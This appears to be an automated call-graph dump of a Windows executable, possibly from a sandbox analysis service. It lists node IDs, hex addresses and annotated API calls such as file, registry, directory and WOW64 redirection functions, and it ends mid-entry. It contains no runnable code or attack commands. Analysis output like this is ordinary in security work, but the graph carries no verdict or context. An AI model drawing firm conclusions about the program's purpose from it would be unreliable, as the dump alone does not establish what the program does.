5105 409aa0 4 API calls 5103->5105 5104->5009 5136 407918 5104->5136 5105->5104 5107 4074b4 5106->5107 5108 4074c4 5107->5108 5109 4073ec 20 API calls 5107->5109 5108->5011 5109->5108 5111 407a35 5110->5111 5112 405880 4 API calls 5111->5112 5113 407a89 5111->5113 5112->5113 5114 407918 InterlockedExchange 5113->5114 5115 407a9b 5114->5115 5116 405880 4 API calls 5115->5116 5117 407ab1 5115->5117 5116->5117 5118 405880 4 API calls 5117->5118 5119 407af4 5117->5119 5118->5119 5119->5014 5129 408b82 5120->5129 5134 408b39 5120->5134 5121 408bcd 5435 407cb8 5121->5435 5122 407cb8 21 API calls 5122->5134 5124 408be4 5127 4031b8 4 API calls 5124->5127 5126 4034f0 4 API calls 5126->5129 5128 408bfe 5127->5128 5146 404c10 5128->5146 5129->5121 5129->5126 5132 403420 4 API calls 5129->5132 5133 4031e8 4 API calls 5129->5133 5135 407cb8 21 API calls 5129->5135 5130 403420 4 API calls 5130->5134 5131 4031e8 4 API calls 5131->5134 5132->5129 5133->5129 5134->5122 5134->5129 5134->5130 5134->5131 5426 4034f0 5134->5426 5135->5129 5461 4078c4 5136->5461 5140 409ac1 5139->5140 5141 409aa9 5139->5141 5142 405880 4 API calls 5140->5142 5143 405880 4 API calls 5141->5143 5144 409ad2 5142->5144 5145 409abb 5143->5145 5144->5007 5145->5007 5147 402594 4 API calls 5146->5147 5148 404c1b 5147->5148 5148->5018 5149->5023 5151 403164 5150->5151 5152 40318c TlsGetValue 5150->5152 5151->5026 5153 403196 5152->5153 5154 40316f 5152->5154 5153->5026 5158 40310c 5154->5158 5156 403174 TlsGetValue 5157 403184 5156->5157 5157->5026 5159 403120 LocalAlloc 5158->5159 5160 403116 5158->5160 5161 40313e TlsSetValue 5159->5161 5162 403132 5159->5162 5160->5159 5161->5162 5162->5156 5235 405930 5163->5235 5166 405270 GetSystemDefaultLCID 5168 4052a6 5166->5168 5167 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5167->5168 5168->5167 5169 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5168->5169 5170 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5168->5170 5172 405308 5168->5172 5169->5168 5170->5168 5171 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5171->5172 5172->5171 5173 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5172->5173 5174 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5172->5174 5175 40538b 5172->5175 5173->5172 5174->5172 5268 4031b8 5175->5268 5178 4053b4 GetSystemDefaultLCID 5272 4051fc GetLocaleInfoA 5178->5272 5181 4031e8 4 API calls 5182 4053f4 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 405409 5183->5184 5185 4051fc 5 API calls 5184->5185 5186 40542d 5185->5186 5278 405248 GetLocaleInfoA 5186->5278 5189 405248 GetLocaleInfoA 5190 40545d 5189->5190 5191 4051fc 5 API calls 5190->5191 5192 405477 5191->5192 5193 405248 GetLocaleInfoA 5192->5193 5194 405494 5193->5194 5195 4051fc 5 API calls 5194->5195 5196 4054ae 5195->5196 5197 4031e8 4 API calls 5196->5197 5198 4054bb 5197->5198 5199 4051fc 5 API calls 5198->5199 5200 4054d0 5199->5200 5201 4031e8 4 API calls 5200->5201 5202 4054dd 5201->5202 5203 405248 GetLocaleInfoA 5202->5203 5204 4054eb 5203->5204 5205 4051fc 5 API calls 5204->5205 5206 405505 5205->5206 5207 4031e8 4 API calls 5206->5207 5208 405512 5207->5208 5209 4051fc 5 API calls 5208->5209 5210 405527 5209->5210 5211 4031e8 4 API calls 5210->5211 5212 405534 5211->5212 5213 4051fc 5 API calls 5212->5213 5214 405549 5213->5214 5215 405566 5214->5215 5216 405557 5214->5216 5218 40322c 4 API calls 5215->5218 5286 40322c 5216->5286 5219 405564 5218->5219 5220 4051fc 5 API calls 5219->5220 5221 405588 5220->5221 5222 4055a5 5221->5222 5223 405596 5221->5223 5225 403198 4 API calls 5222->5225 5224 40322c 4 API calls 5223->5224 5226 4055a3 5224->5226 5225->5226 5280 4033b4 5226->5280 5228 4055c7 5229 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055e1 5229->5230 5231 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5230->5231 5232 4055fb 5231->5232 5233 405ce4 GetVersionExA 5232->5233 5234 405cfb 5233->5234 5234->5043 5236 40593c 5235->5236 5243 404ccc LoadStringA 5236->5243 5239 4031e8 4 API calls 5240 40596d 5239->5240 5246 403198 5240->5246 5250 403278 5243->5250 5247 4031b7 5246->5247 5248 40319e 5246->5248 5247->5166 5248->5247 5264 4025ac 5248->5264 5255 403254 5250->5255 5252 403288 5253 403198 4 API calls 5252->5253 5254 4032a0 5253->5254 5254->5239 5256 403274 5255->5256 5257 403258 5255->5257 5256->5252 5260 402594 5257->5260 5259 403261 5259->5252 5261 402598 5260->5261 5262 4025a2 5260->5262 5261->5262 5263 403154 4 API calls 5261->5263 5262->5259 5262->5262 5263->5262 5265 4025b0 5264->5265 5267 4025ba 5264->5267 5266 403154 4 API calls 5265->5266 5265->5267 5266->5267 5267->5247 5270 4031be 5268->5270 5269 4031e3 5269->5178 5270->5269 5271 4025ac 4 API calls 5270->5271 5271->5270 5273 405223 5272->5273 5274 405235 5272->5274 5275 403278 4 API calls 5273->5275 5276 40322c 4 API calls 5274->5276 5277 405233 5275->5277 5276->5277 5277->5181 5279 405264 5278->5279 5279->5189 5281 4033bc 5280->5281 5282 403254 4 API calls 5281->5282 5283 4033cf 5282->5283 5284 4031e8 4 API calls 5283->5284 5285 4033f7 5284->5285 5288 403230 5286->5288 5287 403252 5287->5219 5288->5287 5289 4025ac 4 API calls 5288->5289 5289->5287 5298 403414 5290->5298 5293 406fee 5294 407284 FormatMessageA 5293->5294 5295 4072aa 5294->5295 5296 403278 4 API calls 5295->5296 5297 4072c7 5296->5297 5297->5050 5299 403418 LoadLibraryA 5298->5299 5299->5293 5307 406af0 5300->5307 5302 406bf3 5303 406c05 5302->5303 5304 406af0 4 API calls 5302->5304 5305 403198 4 API calls 5303->5305 5304->5302 5306 406c1a 5305->5306 5306->5064 5308 406b1c 5307->5308 5309 403278 4 API calls 5308->5309 5310 406b29 5309->5310 5317 403420 5310->5317 5312 406b31 5313 4031e8 4 API calls 5312->5313 5314 406b49 5313->5314 5315 403198 4 API calls 5314->5315 5316 406b6b 5315->5316 5316->5302 5318 403426 5317->5318 5320 403437 5317->5320 5319 403254 4 API calls 5318->5319 5318->5320 5319->5320 5320->5312 5322 407578 5321->5322 5323 4075b7 CreateFileA 5322->5323 5323->5088 5325 403414 5324->5325 5326 4075b7 CreateFileA 5325->5326 5326->5088 5330 4073ec 5327->5330 5331 407284 5 API calls 5330->5331 5333 407414 5331->5333 5332 407434 5342 405880 5332->5342 5333->5332 5339 405184 5333->5339 5336 407443 5337 403198 4 API calls 5336->5337 5338 407460 5337->5338 5338->5089 5346 405198 5339->5346 5343 405887 5342->5343 5344 4031e8 4 API calls 5343->5344 5345 40589f 5344->5345 5345->5336 5347 4051b5 5346->5347 5354 404e48 5347->5354 5350 4051e1 5351 403278 4 API calls 5350->5351 5353 405193 5351->5353 5353->5332 5357 404e63 5354->5357 5355 404e75 5355->5350 5359 404bd4 5355->5359 5357->5355 5362 404f6a 5357->5362 5369 404e3c 5357->5369 5360 405930 5 API calls 5359->5360 5361 404be5 5360->5361 5361->5350 5363 404f7b 5362->5363 5367 404fc9 5362->5367 5365 40504f 5363->5365 5363->5367 5368 404fe7 5365->5368 5376 404e28 5365->5376 5367->5368 5372 404de4 5367->5372 5368->5357 5370 403198 4 API calls 5369->5370 5371 404e46 5370->5371 5371->5357 5373 404df2 5372->5373 5379 404bec 5373->5379 5375 404e20 5375->5367 5392 4039a4 5376->5392 5382 4059a0 5379->5382 5381 404c05 5381->5375 5383 4059ae 5382->5383 5384 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5383->5384 5385 4059d8 5384->5385 5386 405184 19 API calls 5385->5386 5387 4059e6 5386->5387 5388 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 4059f1 5388->5389 5390 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5389->5390 5391 405a0b 5390->5391 5391->5381 5393 4039ab 5392->5393 5398 4038b4 5393->5398 5395 4039cb 5396 403198 4 API calls 5395->5396 5397 4039d2 5396->5397 5397->5368 5399 4038d5 5398->5399 5400 4038c8 5398->5400 5402 403934 5399->5402 5403 4038db 5399->5403 5401 403780 6 API calls 5400->5401 5406 4038d0 5401->5406 5404 403993 5402->5404 5405 40393b 5402->5405 5407 4038e1 5403->5407 5408 4038ee 5403->5408 5409 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5404->5409 5410 403941 5405->5410 5411 40394b 5405->5411 5406->5395 5412 403894 6 API calls 5407->5412 5413 403894 6 API calls 5408->5413 5409->5406 5414 403864 9 API calls 5410->5414 5415 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5411->5415 5412->5406 5416 4038fc 5413->5416 5414->5406 5417 40395d 5415->5417 5418 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5416->5418 5420 403864 9 API calls 5417->5420 5419 403917 5418->5419 5422 40374c VariantClear 5419->5422 5421 403976 5420->5421 5424 40374c VariantClear 5421->5424 5423 40392c 5422->5423 5423->5395 5425 40398b 5424->5425 5425->5395 5427 4034fd 5426->5427 5433 40352d 5426->5433 5429 403526 5427->5429 5431 403509 5427->5431 5428 403198 4 API calls 5434 403517 5428->5434 5430 403254 4 API calls 5429->5430 5430->5433 5441 4025c4 5431->5441 5433->5428 5434->5134 5436 407cd3 5435->5436 5440 407cc8 5435->5440 5445 407c5c 5436->5445 5439 405880 4 API calls 5439->5440 5440->5124 5442 4025ca 5441->5442 5443 4025dc 5442->5443 5444 403154 4 API calls 5442->5444 5443->5434 5443->5443 5444->5443 5446 407c70 5445->5446 5447 407caf 5445->5447 5446->5447 5449 407bac 5446->5449 5447->5439 5447->5440 5450 407bb7 5449->5450 5451 407bc8 5449->5451 5452 405880 4 API calls 5450->5452 5453 4074a0 20 API calls 5451->5453 5452->5451 5454 407bdc 5453->5454 5455 4074a0 20 API calls 5454->5455 5456 407bfd 5455->5456 5457 407918 InterlockedExchange 5456->5457 5458 407c12 5457->5458 5459 407c28 5458->5459 5460 405880 4 API calls 5458->5460 5459->5446 5460->5459 5462 4078d6 5461->5462 5463 4078e7 5461->5463 5464 4078db InterlockedExchange 5462->5464 5463->5009 5464->5463 6237 409e47 6238 409e6c 6237->6238 6239 4098f4 15 API calls 6238->6239 6242 409e71 6239->6242 6240 409ec4 6271 4026c4 GetSystemTime 6240->6271 6242->6240 6245 408dd8 4 API calls 6242->6245 6243 409ec9 6244 409330 32 API calls 6243->6244 6246 409ed1 6244->6246 6247 409ea0 6245->6247 6248 4031e8 4 API calls 6246->6248 6250 409ea8 MessageBoxA 6247->6250 6249 409ede 6248->6249 6251 406928 5 API calls 6249->6251 6250->6240 6253 409eb5 6250->6253 6252 409eeb 6251->6252 6254 4066c0 5 API calls 6252->6254 6255 405854 5 API calls 6253->6255 6256 409efb 6254->6256 6255->6240 6257 406638 5 API calls 6256->6257 6258 409f0c 6257->6258 6259 403340 4 API calls 6258->6259 6260 409f1a 6259->6260 6261 4031e8 4 API calls 6260->6261 6262 409f2a 6261->6262 6263 4074e0 23 API calls 6262->6263 6264 409f69 6263->6264 6265 402594 4 API calls 6264->6265 6266 409f89 6265->6266 6267 407a28 5 API calls 6266->6267 6268 409fcb 6267->6268 6269 407cb8 21 API calls 6268->6269 6270 409ff2 6269->6270 6271->6243 6198 407548 6199 407554 CloseHandle 6198->6199 6200 40755d 6198->6200 6199->6200 6650 402b48 RaiseException 6201 407749 6202 4076dc WriteFile 6201->6202 6210 407724 6201->6210 6203 4076e8 6202->6203 6204 4076ef 6202->6204 6205 40748c 21 API calls 6203->6205 6206 407700 6204->6206 6207 4073ec 20 API calls 6204->6207 6205->6204 6207->6206 6208 4077e0 6209 4078db InterlockedExchange 6208->6209 6212 407890 6208->6212 6211 4078e7 6209->6211 6210->6201 6210->6208 6651 40294a 6652 402952 6651->6652 6653 402967 6652->6653 6654 403554 4 API calls 6652->6654 6654->6652 6655 403f4a 6656 403f53 6655->6656 6657 403f5c 6655->6657 6659 403f07 6656->6659 6662 403f09 6659->6662 6660 403f3c 6660->6657 6664 403e9c 6662->6664 6665 403154 4 API calls 6662->6665 6668 403f3d 6662->6668 6682 403e9c 6662->6682 6663 403ef2 6667 402674 4 API calls 6663->6667 6664->6660 6664->6663 6670 403ea9 6664->6670 6673 403e8e 6664->6673 6665->6662 6672 403ecf 6667->6672 6668->6657 6671 402674 4 API calls 6670->6671 6670->6672 6671->6672 6672->6657 6674 403e4c 6673->6674 6675 403e67 6674->6675 6676 403e62 6674->6676 6677 403e7b 6674->6677 6680 403e78 6675->6680 6681 402674 4 API calls 6675->6681 6678 403cc8 4 API calls 6676->6678 6679 402674 4 API calls 6677->6679 6678->6675 6679->6680 6680->6663 6680->6670 6681->6680 6683 403ed7 6682->6683 6689 403ea9 6682->6689 6684 403ef2 6683->6684 6686 403e8e 4 API calls 6683->6686 6687 402674 4 API calls 6684->6687 6685 403ecf 6685->6662 6688 403ee6 6686->6688 6687->6685 6688->6684 6688->6689 6689->6685 6690 402674 4 API calls 6689->6690 6690->6685 6699 405150 6700 405163 6699->6700 6701 404e48 19 API calls 6700->6701 6702 405177 6701->6702 6272 403a52 6273 403a74 6272->6273 6274 403a5a WriteFile 6272->6274 6274->6273 6275 403a78 GetLastError 6274->6275 6275->6273 6276 402654 6277 403154 4 API calls 6276->6277 6278 402614 6277->6278 6279 402632 6278->6279 6280 403154 4 API calls 6278->6280 6279->6279 6280->6279 5647 409e62 5648 409aa0 4 API calls 5647->5648 5649 409e67 5648->5649 5650 409e6c 5649->5650 5750 402f24 5649->5750 5684 4098f4 5650->5684 5653 409ec4 5689 4026c4 GetSystemTime 5653->5689 5655 409ec9 5690 409330 5655->5690 5656 409e71 5656->5653 5755 408dd8 5656->5755 5660 409ea0 5663 409ea8 MessageBoxA 5660->5663 5661 4031e8 4 API calls 5662 409ede 5661->5662 5708 406928 5662->5708 5663->5653 5666 409eb5 5663->5666 5758 405854 5666->5758 5671 409f0c 5735 403340 5671->5735 5673 409f1a 5674 4031e8 4 API calls 5673->5674 5675 409f2a 5674->5675 5676 4074e0 23 API calls 5675->5676 5677 409f69 5676->5677 5678 402594 4 API calls 5677->5678 5679 409f89 5678->5679 5680 407a28 5 API calls 5679->5680 5681 409fcb 5680->5681 5682 407cb8 21 API calls 5681->5682 5683 409ff2 5682->5683 5762 40953c 5684->5762 5689->5655 5697 409350 5690->5697 5693 409375 CreateDirectoryA 5694 4093ed 5693->5694 5695 40937f GetLastError 5693->5695 5696 40322c 4 API calls 5694->5696 5695->5697 5698 4093f7 5696->5698 5697->5693 5699 408dd8 4 API calls 5697->5699 5704 407284 5 API calls 5697->5704 5707 405880 4 API calls 5697->5707 5854 406cf4 5697->5854 5877 409224 5697->5877 5896 404c84 5697->5896 5899 408da8 5697->5899 5700 4031b8 4 API calls 5698->5700 5699->5697 5702 409411 5700->5702 5703 4031b8 4 API calls 5702->5703 5705 40941e 5703->5705 5704->5697 5705->5661 5707->5697 6009 406820 5708->6009 5711 403454 4 API calls 5712 40694a 5711->5712 5713 4066c0 5712->5713 6014 4068e4 5713->6014 5716 4066f0 5718 403340 4 API calls 5716->5718 5717 4066fe 5719 403454 4 API calls 5717->5719 5720 4066fc 5718->5720 5721 406711 5719->5721 5723 403198 4 API calls 5720->5723 5722 403340 4 API calls 5721->5722 5722->5720 5724 406733 5723->5724 5725 406638 5724->5725 5726 406642 5725->5726 5727 406665 5725->5727 6020 406950 5726->6020 5729 40322c 4 API calls 5727->5729 5731 40666e 5729->5731 5730 406649 5730->5727 5732 406654 5730->5732 5731->5671 5733 403340 4 API calls 5732->5733 5734 406662 5733->5734 5734->5671 5736 403344 5735->5736 5737 4033a5 5735->5737 5738 4031e8 5736->5738 5739 40334c 5736->5739 5740 4031fc 5738->5740 5742 403254 4 API calls 5738->5742 5739->5737 5743 4031e8 4 API calls 5739->5743 5745 40335b 5739->5745 5741 403228 5740->5741 5746 4025ac 4 API calls 5740->5746 5741->5673 5742->5740 5743->5745 5744 403254 4 API calls 5747 403375 5744->5747 5745->5744 5746->5741 5748 4031e8 4 API calls 5747->5748 5749 4033a1 5748->5749 5749->5673 5751 403154 4 API calls 5750->5751 5752 402f29 5751->5752 6026 402bcc 5752->6026 5754 402f51 5754->5754 5756 408da8 4 API calls 5755->5756 5757 408df4 5756->5757 5757->5660 5759 405859 5758->5759 5760 405930 5 API calls 5759->5760 5761 40586b 5760->5761 5761->5761 5769 40955b 5762->5769 5763 409590 5766 40959d GetUserDefaultLangID 5763->5766 5770 409592 5763->5770 5764 409594 5780 407024 GetModuleHandleA GetProcAddress 5764->5780 5766->5770 5768 40956f 5774 409884 5768->5774 5769->5763 5769->5764 5769->5768 5770->5768 5771 4095cb GetACP 5770->5771 5772 4095ef 5770->5772 5771->5768 5771->5770 5772->5768 5773 409615 GetACP 5772->5773 5773->5768 5773->5772 5775 40988c 5774->5775 5779 4098c6 5774->5779 5776 403420 4 API calls 5775->5776 5775->5779 5777 4098c0 5776->5777 5838 408e80 5777->5838 5779->5656 5781 407067 5780->5781 5782 40705e 5780->5782 5783 407070 5781->5783 5784 4070a8 5781->5784 5793 403198 4 API calls 5782->5793 5801 406f68 5783->5801 5786 406f68 RegOpenKeyExA 5784->5786 5788 4070c1 5786->5788 5787 407089 5789 4070de 5787->5789 5804 406f5c 5787->5804 5788->5789 5790 406f5c 6 API calls 5788->5790 5791 40322c 4 API calls 5789->5791 5794 4070d5 RegCloseKey 5790->5794 5795 4070eb 5791->5795 5797 407120 5793->5797 5794->5789 5807 4032fc 5795->5807 5799 403198 4 API calls 5797->5799 5800 407128 5799->5800 5800->5770 5802 406f73 5801->5802 5803 406f79 RegOpenKeyExA 5801->5803 5802->5803 5803->5787 5821 406e10 5804->5821 5808 403300 5807->5808 5809 40333f 5807->5809 5810 4031e8 5808->5810 5811 40330a 5808->5811 5809->5782 5812 4031fc 5810->5812 5818 403254 4 API calls 5810->5818 5813 403334 5811->5813 5814 40331d 5811->5814 5815 403228 5812->5815 5819 4025ac 4 API calls 5812->5819 5817 4034f0 4 API calls 5813->5817 5816 4034f0 4 API calls 5814->5816 5815->5782 5820 403322 5816->5820 5817->5820 5818->5812 5819->5815 5820->5782 5822 406e36 RegQueryValueExA 5821->5822 5823 406e7b 5822->5823 5829 406e59 5822->5829 5825 403198 4 API calls 5823->5825 5824 406e73 5826 403198 4 API calls 5824->5826 5827 406f47 RegCloseKey 5825->5827 5826->5823 5827->5789 5828 403278 4 API calls 5828->5829 5829->5823 5829->5824 5829->5828 5830 403420 4 API calls 5829->5830 5831 406eb0 RegQueryValueExA 5830->5831 5831->5822 5832 406ecc 5831->5832 5832->5823 5833 4034f0 4 API calls 5832->5833 5834 406f0e 5833->5834 5835 406f20 5834->5835 5837 403420 4 API calls 5834->5837 5836 4031e8 4 API calls 5835->5836 5836->5823 5837->5835 5840 408e8e 5838->5840 5841 408ea6 5840->5841 5851 408e18 5840->5851 5842 408e18 4 API calls 5841->5842 5843 408eca 5841->5843 5842->5843 5844 407918 InterlockedExchange 5843->5844 5845 408ee5 5844->5845 5846 408e18 4 API calls 5845->5846 5848 408ef8 5845->5848 5846->5848 5847 408e18 4 API calls 5847->5848 5848->5847 5849 403278 4 API calls 5848->5849 5850 408f27 5848->5850 5849->5848 5850->5779 5852 405880 4 API calls 5851->5852 5853 408e29 5852->5853 5853->5841 5903 406a58 5854->5903 5857 406d26 5859 406a58 5 API calls 5857->5859 5861 406d72 5857->5861 5860 406d36 5859->5860 5862 406d42 5860->5862 5864 406a34 7 API calls 5860->5864 5911 406888 5861->5911 5862->5861 5867 406a58 5 API calls 5862->5867 5873 406d67 5862->5873 5864->5862 5869 406d5b 5867->5869 5868 406638 5 API calls 5870 406d87 5868->5870 5871 406a34 7 API calls 5869->5871 5869->5873 5872 40322c 4 API calls 5870->5872 5871->5873 5874 406d91 5872->5874 5873->5861 5923 406cc8 GetWindowsDirectoryA 5873->5923 5875 4031b8 4 API calls 5874->5875 5876 406dab 5875->5876 5876->5697 5878 409244 5877->5878 5879 406638 5 API calls 5878->5879 5880 40925d 5879->5880 5881 40322c 4 API calls 5880->5881 5888 409268 5881->5888 5883 406978 6 API calls 5883->5888 5884 408dd8 4 API calls 5884->5888 5885 4033b4 4 API calls 5885->5888 5886 405880 4 API calls 5886->5888 5888->5883 5888->5884 5888->5885 5888->5886 5889 4092e4 5888->5889 5963 4091b0 5888->5963 5971 409034 5888->5971 5890 40322c 4 API calls 5889->5890 5891 4092ef 5890->5891 5892 4031b8 4 API calls 5891->5892 5893 409309 5892->5893 5894 403198 4 API calls 5893->5894 5895 409311 5894->5895 5895->5697 5897 405198 19 API calls 5896->5897 5898 404ca2 5897->5898 5898->5697 5900 408dc8 5899->5900 5999 408c80 5900->5999 5904 4034f0 4 API calls 5903->5904 5905 406a6b 5904->5905 5906 406a82 GetEnvironmentVariableA 5905->5906 5910 406a95 5905->5910 5925 406dec 5905->5925 5906->5905 5907 406a8e 5906->5907 5909 403198 4 API calls 5907->5909 5909->5910 5910->5857 5920 406a34 5910->5920 5912 403414 5911->5912 5913 4068ab GetFullPathNameA 5912->5913 5914 4068b7 5913->5914 5915 4068ce 5913->5915 5914->5915 5916 4068bf 5914->5916 5917 40322c 4 API calls 5915->5917 5918 403278 4 API calls 5916->5918 5919 4068cc 5917->5919 5918->5919 5919->5868 5929 4069dc 5920->5929 5924 406ce9 5923->5924 5924->5861 5926 406dfa 5925->5926 5927 4034f0 4 API calls 5926->5927 5928 406e08 5927->5928 5928->5905 5936 406978 5929->5936 5931 4069fe 5932 406a06 GetFileAttributesA 5931->5932 5933 406a1b 5932->5933 5934 403198 4 API calls 5933->5934 5935 406a23 5934->5935 5935->5857 5946 406744 5936->5946 5938 4069b0 5941 4069c6 5938->5941 5942 4069bb 5938->5942 5940 406989 5940->5938 5953 406970 CharPrevA 5940->5953 5954 403454 5941->5954 5943 40322c 4 API calls 5942->5943 5945 4069c4 5943->5945 5945->5931 5949 406755 5946->5949 5947 4067b9 5948 406680 IsDBCSLeadByte 5947->5948 5951 4067b4 5947->5951 5948->5951 5949->5947 5950 406773 5949->5950 5950->5951 5961 406680 IsDBCSLeadByte 5950->5961 5951->5940 5953->5940 5955 403486 5954->5955 5956 403459 5954->5956 5957 403198 4 API calls 5955->5957 5956->5955 5959 40346d 5956->5959 5958 40347c 5957->5958 5958->5945 5960 403278 4 API calls 5959->5960 5960->5958 5962 406694 5961->5962 5962->5950 5964 403198 4 API calls 5963->5964 5965 4091d1 5964->5965 5968 4091fe 5965->5968 5980 4032a8 5965->5980 5983 403494 5965->5983 5969 403198 4 API calls 5968->5969 5970 409213 5969->5970 5970->5888 5987 408f70 5971->5987 5973 40904a 5974 40904e 5973->5974 5993 406a48 5973->5993 5974->5888 5977 409081 5996 408fac 5977->5996 5981 403278 4 API calls 5980->5981 5982 4032b5 5981->5982 5982->5965 5984 403498 5983->5984 5986 4034c3 5983->5986 5985 4034f0 4 API calls 5984->5985 5985->5986 5986->5965 5988 408f7a 5987->5988 5989 408f7e 5987->5989 5988->5973 5990 408fa0 SetLastError 5989->5990 5991 408f87 Wow64DisableWow64FsRedirection 5989->5991 5992 408f9b 5990->5992 5991->5992 5992->5973 5994 4069dc 7 API calls 5993->5994 5995 406a52 GetLastError 5994->5995 5995->5977 5997 408fb1 Wow64RevertWow64FsRedirection 5996->5997 5998 408fbb 5996->5998 5997->5998 5998->5888 6000 403198 4 API calls 5999->6000 6006 408cb1 5999->6006 6000->6006 6001 408cdc 6002 4031b8 4 API calls 6001->6002 6004 408d69 6002->6004 6003 408cc8 6007 4032fc 4 API calls 6003->6007 6004->5697 6005 403278 4 API calls 6005->6006 6006->6001 6006->6003 6006->6005 6008 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6006->6008 6007->6001 6008->6006 6010 406744 IsDBCSLeadByte 6009->6010 6012 406835 6010->6012 6011 40687f 6011->5711 6012->6011 6013 406680 IsDBCSLeadByte 6012->6013 6013->6012 6015 4068f3 6014->6015 6016 406820 IsDBCSLeadByte 6015->6016 6018 4068fe 6016->6018 6017 4066ea 6017->5716 6017->5717 6018->6017 6019 406680 IsDBCSLeadByte 6018->6019 6019->6018 6021 406957 6020->6021 6022 40695b 6020->6022 6021->5730 6025 406970 CharPrevA 6022->6025 6024 40696c 6024->5730 6025->6024 6027 402bd5 RaiseException 6026->6027 6028 402be6 6026->6028 6027->6028 6028->5754 6281 402e64 6282 402e69 6281->6282 6283 402e7a RtlUnwind 6282->6283 6284 402e5e 6282->6284 6285 402e9d 6283->6285 6302 40667c IsDBCSLeadByte 6303 406694 6302->6303 6715 403f7d 6716 403fa2 6715->6716 6719 403f84 6715->6719 6718 403e8e 4 API calls 6716->6718 6716->6719 6717 403f8c 6718->6719 6719->6717 6720 402674 4 API calls 6719->6720 6721 403fca 6720->6721 6728 403d02 6735 403d12 6728->6735 6729 403ddf ExitProcess 6730 403db8 6732 403cc8 4 API calls 6730->6732 6731 403dea 6733 403dc2 6732->6733 6734 403cc8 4 API calls 6733->6734 6736 403dcc 6734->6736 6735->6729 6735->6730 6735->6731 6735->6735 6738 403da4 6735->6738 6739 403d8f MessageBoxA 6735->6739 6748 4019dc 6736->6748 6744 403fe4 6738->6744 6739->6730 6741 403dd1 6741->6729 6741->6731 6745 403fe8 6744->6745 6746 403f07 4 API calls 6745->6746 6747 404006 6746->6747 6749 401abb 6748->6749 6750 4019ed 6748->6750 6749->6741 6751 401a04 RtlEnterCriticalSection 6750->6751 6752 401a0e LocalFree 6750->6752 6751->6752 6753 401a41 6752->6753 6754 401a2f VirtualFree 6753->6754 6755 401a49 6753->6755 6754->6753 6756 401a70 LocalFree 6755->6756 6757 401a87 6755->6757 6756->6756 6756->6757 6758 401aa9 RtlDeleteCriticalSection 6757->6758 6759 401a9f RtlLeaveCriticalSection 6757->6759 6758->6741 6759->6758 6312 404206 6313 4041cc 6312->6313 6314 40420a 6312->6314 6315 404282 6314->6315 6316 403154 4 API calls 6314->6316 6317 404323 6316->6317 6318 402c08 6321 402c82 6318->6321 6322 402c19 6318->6322 6319 402c56 RtlUnwind 6320 403154 4 API calls 6319->6320 6320->6321 6322->6319 6322->6321 6325 402b28 6322->6325 6326 402b31 RaiseException 6325->6326 6327 402b47 6325->6327 6326->6327 6327->6319 6328 408c10 6329 408c17 6328->6329 6330 403198 4 API calls 6329->6330 6338 408cb1 6330->6338 6331 408cdc 6332 4031b8 4 API calls 6331->6332 6334 408d69 6332->6334 6333 408cc8 6336 4032fc 4 API calls 6333->6336 6335 403278 4 API calls 6335->6338 6336->6331 6337 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6337->6338 6338->6331 6338->6333 6338->6335 6338->6337 6339 40a011 6340 40a036 6339->6340 6341 407918 InterlockedExchange 6340->6341 6343 40a060 6341->6343 6342 40a070 6349 4076ac SetEndOfFile 6342->6349 6343->6342 6344 409aa0 4 API calls 6343->6344 6344->6342 6346 40a08c 6347 4025ac 4 API calls 6346->6347 6348 40a0c3 6347->6348 6350 4076c3 6349->6350 6351 4076bc 6349->6351 6350->6346 6352 40748c 21 API calls 6351->6352 6352->6350 6764 409916 6765 409918 6764->6765 6766 40993a 6765->6766 6767 409956 CallWindowProcA 6765->6767 6767->6766 6080 407017 6081 407008 SetErrorMode 6080->6081 6357 403018 6358 403070 6357->6358 6359 403025 6357->6359 6360 40302a RtlUnwind 6359->6360 6361 40304e 6360->6361 6363 402f78 6361->6363 6364 402be8 6361->6364 6365 402bf1 RaiseException 6364->6365 6366 402c04 6364->6366 6365->6366 6366->6358 6774 409918 6775 409927 6774->6775 6776 40993a 6774->6776 6775->6776 6777 409956 CallWindowProcA 6775->6777 6777->6776 6371 40901e 6372 409010 6371->6372 6373 408fac Wow64RevertWow64FsRedirection 6372->6373 6374 409018 6373->6374 6375 409020 SetLastError 6376 409029 6375->6376 6387 403a28 ReadFile 6388 403a46 6387->6388 6389 403a49 GetLastError 6387->6389 6218 40762c ReadFile 6219 407663 6218->6219 6220 40764c 6218->6220 6221 407652 GetLastError 6220->6221 6222 40765c 6220->6222 6221->6219 6221->6222 6223 40748c 21 API calls 6222->6223 6223->6219 6394 40a02c 6395 409aa0 4 API calls 6394->6395 6396 40a031 6395->6396 6397 40a036 6396->6397 6398 402f24 5 API calls 6396->6398 6399 407918 InterlockedExchange 6397->6399 6398->6397 6400 40a060 6399->6400 6401 40a070 6400->6401 6402 409aa0 4 API calls 6400->6402 6403 4076ac 22 API calls 6401->6403 6402->6401 6404 40a08c 6403->6404 6405 4025ac 4 API calls 6404->6405 6406 40a0c3 6405->6406 6778 40712e 6779 407118 6778->6779 6780 403198 4 API calls 6779->6780 6781 407120 6780->6781 6782 403198 4 API calls 6781->6782 6783 407128 6782->6783 6784 408f30 6787 408dfc 6784->6787 6788 408e05 6787->6788 6789 403198 4 API calls 6788->6789 6790 408e13 6788->6790 6789->6788 6791 403932 6792 403924 6791->6792 6795 40374c 6792->6795 6794 40392c 6796 403759 6795->6796 6797 403766 6795->6797 6796->6797 6798 403779 VariantClear 6796->6798 6797->6794 6798->6794 6029 4075c4 SetFilePointer 6030 4075f7 6029->6030 6031 